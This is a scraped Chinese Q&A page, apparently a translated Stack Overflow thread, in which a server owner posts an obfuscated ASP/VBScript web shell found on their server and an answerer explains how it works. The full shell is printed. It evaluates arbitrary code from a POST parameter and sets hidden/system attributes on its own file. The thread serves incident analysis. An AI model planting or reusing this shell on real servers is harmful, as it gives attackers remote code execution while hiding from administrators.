Asp.net VB恶意软件工具逆向工程_Asp.net_Vb.net

Asp.net VB恶意软件工具逆向工程

asp.net vb.net

Asp.net VB恶意软件工具逆向工程,asp.net,vb.net,Asp.net,Vb.net,我在我的服务器上发现了有趣的恶意软件，它做了一些坏事。现在我正在尝试反向工程，但由于完全缺乏VB\ASP的知识，我需要请您的帮助，同事们 <% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) End Function Execute MorfiCoder(")/*/srerif/*/(tseuqer lave") Set fso=CreateO

我在我的服务器上发现了有趣的恶意软件，它做了一些坏事。现在我正在尝试反向工程，但由于完全缺乏VB\ASP的知识，我需要请您的帮助，同事们

<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function

Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if  f.attributes <> 39 then
f.attributes = 39
end if
%>

据我所知，它执行一些命令，并在某处创建具有system\隐藏属性的文件。主要的问题是-如何使用它，也就是说，从我看到的日志来看，黑客上传了这个文件，并使用POST命令这个文件。我也想通过命令来理解，他是如何将文件上传到一些文件夹的，他应该能够做到这一点

欢迎任何意见。带有curl POST的示例将是惊人的。

不，不需要VB中的知识来研究代码的功能；只需阅读文档即可

MorfiCoder（“）/*/srerif/*/（tseuqer-lave”）

eval请求（“firers”）

（我假设

Replace

或

StrReverse

之类的函数是显而易见的）

执行和评估是不言自明的；

请求

的文档包括：

请求对象检索客户端浏览器在HTTP请求期间传递给服务器的值

因此，无论

firers

request变量中的字符串是什么，它都将被执行（您说您已经知道攻击者使用简单的POST将数据发送到他的脚本）

Set fso=CreateObject（“Scripting.FileSystemObject”）

Set f=fso.GetFile（Request.ServerVariables（“PATH\u TRANSLATED”））

a；使用中的路径

然后在该文件对象上设置一些（

Archive

、

System

、

Hidden

、

ReadOnly

）以隐藏此脚本

显然，您提供的信息无法回答攻击者为何能够将此文件上载到服务器，这也超出了此问题的范围，可能与stackoverflow无关。

比如，您是否知道恶意软件是如何到达的？我刚刚在我的服务器上找到了它（使用Adodb.Stream而不是FileSystemObject）。需要知道这是怎么做到的。@tofutim我在一台安全系统很差的windows服务器上发现了同样的情况……实际上在过去一年中不止一次，这是对时间的严重浪费：(